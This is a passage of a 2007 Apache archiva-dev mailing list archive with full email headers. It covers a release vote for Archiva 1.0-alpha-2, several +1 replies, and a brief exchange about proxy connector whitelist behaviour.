permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 23 Jun 2007 19:05:00 -0700 Received: by an-out-0708.google.com with SMTP id d30so292519and for <[email protected]>; Sat, 23 Jun 2007 19:04:39 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=QqJcNEAqN1QpmSuWOmTUtfAQOq0+CU0ifvmwqSor9jgLMjoErmdhUNn5wuS4j/kQ1wXXCRKbK+QrJuXknHsyF3z5Jcz4ZgeV8cOJekG9uwLun2ybSw2aMIWDabVS91+4UrO6DBQrHl6WH86JQoS7v/QXUdx4qTXG6aa7z0JTph4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=ZJbbGMyN/n0HDG9BMCrCnALus+4mURIZIx9Vz09bC0KA8mw+nKa88alIEsSEYITef8r0LYpqU1xFe0o4s/E+k3v32nWhHJat1ODn5Jg/UVLfJNVvoOqPEBE8u3o9j6+iptDURucPFgnFdsdhr4+AVdwxfc0qKKYWEfzcGDSQ+po= Received: by 161.129.204.104 with SMTP id f16mr2430919and.1182650679083; Sat, 23 Jun 2007 19:04:39 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 23 Jun 2007 19:04:39 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 23 Jun 2007 19:04:39 -0700 From: "Wendy Smoak" <[email protected]> To: [email protected] Subject: Re: Planning for 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/23/07, Arnaud HERITIER <[email protected]> wrote: > ok, sorry for the question. I didn't remember. No apology necessary... I wasn't very clear about my plans. :) It's staged here if anyone wants a preview: http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ I'll call a vote after I have a chance to review it. Release Diary (uneventful this time!) is here: http://wiki.wsmoak.net/cgi-bin/wiki.pl?Archiva10Alpha2Release -- Wendy From [email protected] Sun Jun 24 20:08:59 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74443 invoked from network); 24 Jun 2007 20:08:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2007 20:08:58 -0000 Received: (qmail 36641 invoked by uid 500); 24 Jun 2007 20:09:01 -0000 Delivered-To: [email protected] Received: (qmail 36531 invoked by uid 500); 24 Jun 2007 20:09:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36522 invoked by uid 99); 24 Jun 2007 20:09:00 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 13:09:00 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 13:08:56 -0700 Received: by an-out-0708.google.com with SMTP id d30so320492and for <[email protected]>; Sun, 24 Jun 2007 13:08:34 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=BaKHRNyiAt1fbZaXlpffRYodxDjKacwOpp+UHPNStc05asrsLyzjJaKwAmziIrFg53XskFxmJTYAPf4IBPEaEV7reNwmbFBN7+LzrTDLuIpq7Da2GZlgKdJBO196lSEWDBeaCAgNJsMbzC9TKgadi4KZUEROuqUbRbMJwY2z21M= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=tTNx25IXYJCn7AJzyanMtdcei1L0dr5z4f6ww0RCo+T/euGf7xYsBVtuI3rnLcJoU4Ct40a98a/r/wmUp1LU+lqzsqFIcJWE6GINwd84GH5AJiajkVJT7+mc7p+kJwYyazsaBA6Nt4rX3kCngC78S6pKI5OuaRbK84/rUD5j0V4= Received: by 161.129.204.104 with SMTP id v9mr2756177anc.1182715714771; Sun, 24 Jun 2007 13:08:34 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 24 Jun 2007 13:08:34 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 24 Jun 2007 13:08:34 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: [VOTE] Release Archiva 1.0-alpha-2 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed files, including source and binary distributions, checksums, and signatures, can be found here: http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ This release resolves several issues with proxying artifacts, and modifying the configuration through the web UI. The list of issues identified and closed with this release can be found below: Archiva 1.0-alpha-2 Release Notes: http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create (There were 16 issues still marked fix-for this version, which I moved to 1.0.x in JIRA.) Once you have had a chance to examine the distribution, please cast your vote. We welcome votes and feedback from all community members. [ ] +1 Release it! [ ] 0 [ ] -1 Don't release it, because... 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have time to do anything else with it until Friday. -- Wendy From [email protected] Sun Jun 24 21:15:05 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82490 invoked from network); 24 Jun 2007 21:15:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2007 21:15:04 -0000 Received: (qmail 11967 invoked by uid 500); 24 Jun 2007 21:15:08 -0000 Delivered-To: [email protected] Received: (qmail 11942 invoked by uid 500); 24 Jun 2007 21:15:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11933 invoked by uid 99); 24 Jun 2007 21:15:07 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 14:15:07 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 14:15:03 -0700 Received: by ug-out-1314.google.com with SMTP id 34so1324587ugf for <[email protected]>; Sun, 24 Jun 2007 14:14:42 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=O1SIGB4mymTbHOVmcnchZa4ZaYjTivJordwM6yoNoU38uEVC42otD9ZgTr8IvXv1NkWdoInvRVNJZwSeRz8KiEI1D5kfZ9TYE1JldBfUIKU2UmDsxVffU7r2iEUaL8ScdcxiZ0oRHmY0rlKIdi/3xKVC7XXpKl+6iGGW3wJ7fiY= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=UdVZ/QzfPGqnzDKv6LRVQo6MPtGloBrf7l2ns+/SEBd2rUS/3yFa+HkMV8DGzIbg0TtDf6WP2K0Oh01XPJBvOCHMxARcVTXFa0rWCWHe+I0r2tPr7iweRGb808NWto8K6HR58D2tH4mR6lgeo//xgNADUxGqHk8w4hyL2qOb6xQ= Received: by 161.129.204.104 with SMTP id s12mr4648042ugj.1182719682433; Sun, 24 Jun 2007 14:14:42 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 24 Jun 2007 14:14:42 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 24 Jun 2007 14:14:42 -0700 From: "Carlos Sanchez" <[email protected]> Sender: [email protected] To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Google-Sender-Auth: fcd3c1454f67c135 X-Virus-Checked: Checked by ClamAV on apache.org +1 On 6/24/07, Wendy Smoak <[email protected]> wrote: > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > files, including source and binary distributions, checksums, and > signatures, can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > This release resolves several issues with proxying artifacts, and > modifying the configuration through the web UI. The list of issues > identified and closed with this release can be found below: > > Archiva 1.0-alpha-2 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > (There were 16 issues still marked fix-for this version, which I moved > to 1.0.x in JIRA.) > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > time to do anything else with it until Friday. > > -- > Wendy > -- I could give you my word as a Spaniard. No good. I've known too many Spaniards. -- The Princess Bride From [email protected] Sun Jun 24 21:25:27 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85009 invoked from network); 24 Jun 2007 21:25:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2007 21:25:26 -0000 Received: (qmail 21954 invoked by uid 500); 24 Jun 2007 21:25:29 -0000 Delivered-To: [email protected] Received: (qmail 21921 invoked by uid 500); 24 Jun 2007 21:25:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21912 invoked by uid 99); 24 Jun 2007 21:25:29 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 14:25:29 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 14:25:25 -0700 Received: by an-out-0708.google.com with SMTP id d30so323116and for <[email protected]>; Sun, 24 Jun 2007 14:25:04 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=F7j9qBq0DuczA24P6MNqMuZNV4UrcviGkKdF9IFpDh4kOyEU4GVnnur+8i5z7OnMJ8k/dwCz0yapvlSqeQdfIxEIS313HzzcVR7FakkH8Ln5iKBBN0mIU0DfXmpLZfTn8uEJfdz+Lk7rvOZbBJGyztRHKeiFx/YoteEkIbVgN3E= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=iETAaVhOHdSaRsaaHUq8u3yhCt+Jnnk7ZidilLWmDouKTqzmqfrZinepuZsHHpEx6mXqAY8XPQbocu3QvIVASt0yOvGBaC344AK/b1CPjqvGizDb6lChwMplGZJjeJCgZEigAfZ1L1fAridWsToxAa3BpRfaCsHjaUkTZ5U9N68= Received: by 161.129.204.104 with SMTP id f16mr2769452and.1182720304155; Sun, 24 Jun 2007 14:25:04 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sun, 24 Jun 2007 14:25:04 -0700 (PDT) Message-ID: <[email protected]> Date: Sun, 24 Jun 2007 14:25:04 -0700 From: "Wendy Smoak" <[email protected]> To: "Archiva Developers List" <[email protected]> Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 6/24/07, Wendy Smoak <[email protected]> wrote: > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... +1 -- Wendy From [email protected] Mon Jun 25 03:09:16 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86766 invoked from network); 25 Jun 2007 03:09:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 03:09:15 -0000 Received: (qmail 69116 invoked by uid 500); 25 Jun 2007 03:09:18 -0000 Delivered-To: [email protected] Received: (qmail 69084 invoked by uid 500); 25 Jun 2007 03:09:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69075 invoked by uid 99); 25 Jun 2007 03:09:18 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 20:09:18 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nz-out-0506.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 24 Jun 2007 20:09:13 -0700 Received: by nz-out-0506.google.com with SMTP id q3so1117180nzb for <[email protected]>; Sun, 24 Jun 2007 20:08:52 -0700 (PDT) Received: by 161.129.204.104 with SMTP id s1mr5041769wae.1182740931390; Sun, 24 Jun 2007 20:08:51 -0700 (PDT) Received: from ?161.129.204.104? ( [161.129.204.104]) by mx.google.com with ESMTP id y25sm9598955pod.2161.129.204.104.08.48 (version=TLSv1/SSLv3 cipher=RC4-MD5); Sun, 24 Jun 2007 20:08:50 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 25 Jun 2007 11:08:41 +0800 From: Maria Odea Ching <[email protected]> User-Agent: Thunderbird 161.129.204.104 (X11/20070604) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org +1, tested ok -Deng Wendy Smoak wrote: > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > files, including source and binary distributions, checksums, and > signatures, can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > This release resolves several issues with proxying artifacts, and > modifying the configuration through the web UI. The list of issues > identified and closed with this release can be found below: > > Archiva 1.0-alpha-2 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > > (There were 16 issues still marked fix-for this version, which I moved > to 1.0.x in JIRA.) > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > time to do anything else with it until Friday. > > -- > Wendy > From [email protected] Mon Jun 25 08:18:20 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65235 invoked from network); 25 Jun 2007 08:18:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 08:18:18 -0000 Received: (qmail 56614 invoked by uid 500); 25 Jun 2007 08:18:21 -0000 Delivered-To: [email protected] Received: (qmail 56555 invoked by uid 500); 25 Jun 2007 08:18:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56532 invoked by uid 99); 25 Jun 2007 08:18:21 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 01:18:21 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 01:18:14 -0700 Received: by an-out-0708.google.com with SMTP id d30so345809and for <[email protected]>; Mon, 25 Jun 2007 01:17:48 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=LcYYmFd1w70k8E/Bb6cD/X3aU3I1PtfmBGwSHDxC1iop0fCkVAP0oiH1VZ2ARSem/rm1vJLv8dhNELydnLeDZ8oTvR9ZwOa54jIBn63u0wN2T/kmFJmxPDtXRaP7s2p9GmYMLtsFS1DRCG22VY7zWejqVHZPRcWGY+hkZ1K9CMc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=YCEPxW2rRhBN9NWLvxmrAQ2YlNi+w9rr2Bfl+FwI5JVHc3xoTostfZGnYMS62wmbCPttGu6xTpnQyl7QYHf8sHfP4qh4GHwquchD6uMOLIyGcR6ZMJuxotszh3WAEbvfthIdLTEXKwUVR1ZxbPv8LO3WV4yRrjaXENbrq/DJ9co= Received: by 161.129.204.104 with SMTP id 20mr3000906anj.1182759467984; Mon, 25 Jun 2007 01:17:47 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 25 Jun 2007 01:17:47 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 25 Jun 2007 10:17:47 +0200 From: "Fabrice Bellingard" <[email protected]> To: [email protected] Subject: Re: Proxy connector whitelist/blacklist In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_98351_21603619.1182759467935" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_98351_21603619.1182759467935 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Wendy, even without a whitelist entry of "*", this proxy connector is working for me... Fabrice. On 6/23/07, Wendy Smoak <[email protected]> wrote: > > The proxy connector in the default configuration was apparently > intended to proxy requests from internal to central, but it wasn't > proxying anything. To get it to work, I added a whitelist entry of > '*'. > > Is that working as designed, or should 'blank' (no whitelist or > blacklist entries) mean 'proxy everything' (as seems to be implied by > the original default config)? > > This needs to be documented so I don't have to guess. :) I see it in > the list of Concepts on [1] but couldn't find anything else. > > [1] http://maven.apache.org/archiva/hacking/index.html > > -- > Wendy > ------=_Part_98351_21603619.1182759467935-- From [email protected] Mon Jun 25 08:24:24 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66965 invoked from network); 25 Jun 2007 08:24:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 08:24:23 -0000 Received: (qmail 75046 invoked by uid 500); 25 Jun 2007 08:24:26 -0000 Delivered-To: [email protected] Received: (qmail 74928 invoked by uid 500); 25 Jun 2007 08:24:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74919 invoked by uid 99); 25 Jun 2007 08:24:26 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 01:24:26 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 01:24:22 -0700 Received: by an-out-0708.google.com with SMTP id d30so346091and for <[email protected]>; Mon, 25 Jun 2007 01:24:01 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=gQcIw09QphZ6s3c+bIYZjGB6PRsnGNlZc0dmWkm/xrzM+jk0Q0BHFsNPqImiMa/y405uL/9C5ErqBcWof5HusTmHlNqcgHzypFUuoQRNrQoQ7u1v3G33Nt4QBAaPZNxFBYYZWwROBSLSeKeIR3EDm617tJTVT0hVGQUn2AX2xls= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=cwdq6mdfs91ol8QNgrCdy/OUa2x5UONU0qlziK67zRfO4qsiRsB+eQJyugv7qguKFUunDpuEUcjtwj5Is3ByE5PQSHmApbT7Isr8TCYoT5LUHzgANVFy39IIrAya9tboG02tOvuxheoY82zNrT1UxbC872h6BTEn8cSbujdDd9s= Received: by 161.129.204.104 with SMTP id q13mr2975636ane.1182759841370; Mon, 25 Jun 2007 01:24:01 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 25 Jun 2007 01:24:01 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 25 Jun 2007 10:24:01 +0200 From: "Fabrice Bellingard" <[email protected]> To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_98411_11013468.1182759841269" References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_98411_11013468.1182759841269 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Definitely +1 ! :-) Fabrice. On 6/24/07, Wendy Smoak <[email protected]> wrote: > > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > files, including source and binary distributions, checksums, and > signatures, can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > This release resolves several issues with proxying artifacts, and > modifying the configuration through the web UI. The list of issues > identified and closed with this release can be found below: > > Archiva 1.0-alpha-2 Release Notes: > > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > (There were 16 issues still marked fix-for this version, which I moved > to 1.0.x in JIRA.) > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > time to do anything else with it until Friday. > > -- > Wendy > ------=_Part_98411_11013468.1182759841269-- From [email protected] Mon Jun 25 09:15:24 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83293 invoked from network); 25 Jun 2007 09:15:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 09:15:22 -0000 Received: (qmail 90644 invoked by uid 500); 25 Jun 2007 09:15:26 -0000 Delivered-To: [email protected] Received: (qmail 90620 invoked by uid 500); 25 Jun 2007 09:15:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90611 invoked by uid 99); 25 Jun 2007 09:15:25 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 02:15:25 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 25 Jun 2007 02:15:21 -0700 Received: (qmail 3590 invoked from network); 25 Jun 2007 09:15:00 -0000 Received: from 66.210.72-86.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 25 Jun 2007 09:15:00 -0000 Message-ID: <[email protected]> Date: Mon, 25 Jun 2007 11:14:49 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070509) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org +1 Emmanuel Wendy Smoak a écrit : > Archiva 1.0-alpha-2 was tagged and built on Saturday. The proposed > files, including source and binary distributions, checksums, and > signatures, can be found here: > > http://people.apache.org/builds/maven/archiva/1.0-alpha-2/ > > This release resolves several issues with proxying artifacts, and > modifying the configuration through the web UI. The list of issues > identified and closed with this release can be found below: > > Archiva 1.0-alpha-2 Release Notes: > > http://jira.codehaus.org/secure/ReleaseNote.jspa?version=13518&styleName=Text&projectId=10980&Create=Create > > > (There were 16 issues still marked fix-for this version, which I moved > to 1.0.x in JIRA.) > > Once you have had a chance to examine the distribution, please cast > your vote. We welcome votes and feedback from all community members. > > [ ] +1 Release it! > [ ] 0 > [ ] -1 Don't release it, because... > > 72 hours ends Wednesday afternoon (GMT -7), but I probably won't have > time to do anything else with it until Friday. > > -- > Wendy > > > From [email protected] Mon Jun 25 14:51:18 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33858 invoked from network); 25 Jun 2007 14:51:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2007 14:51:10 -0000 Received: (qmail 84904 invoked by uid 500); 25 Jun 2007 14:51:13 -0000 Delivered-To: [email protected] Received: (qmail 84871 invoked by uid 500); 25 Jun 2007 14:51:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <archiva-dev.maven.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 84862 invoked by uid 99); 25 Jun 2007 14:51:13 -0000 Received: from herse.apache.org (HELO herse.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 07:51:13 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (herse.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.sventech.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 25 Jun 2007 07:51:07 -0700 Received: from mail.sventech.com (localhost.localdomain [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 2C5134809C for <[email protected]>; Mon, 25 Jun 2007 14:50:47 +0000 (UTC) Received: from [161.129.204.104] (unknown [161.129.204.104]) by mail.sventech.com (Postfix) with ESMTP id 081BA48020 for <[email protected]>; Mon, 25 Jun 2007 14:50:46 +0000 (UTC) Message-ID: <[email protected]> Date: Mon, 25 Jun 2007 07:50:39 -0700 From: Joakim Erdfelt <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070604) MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE] Release Archiva 1.0-alpha-2 References: <[email protected]> 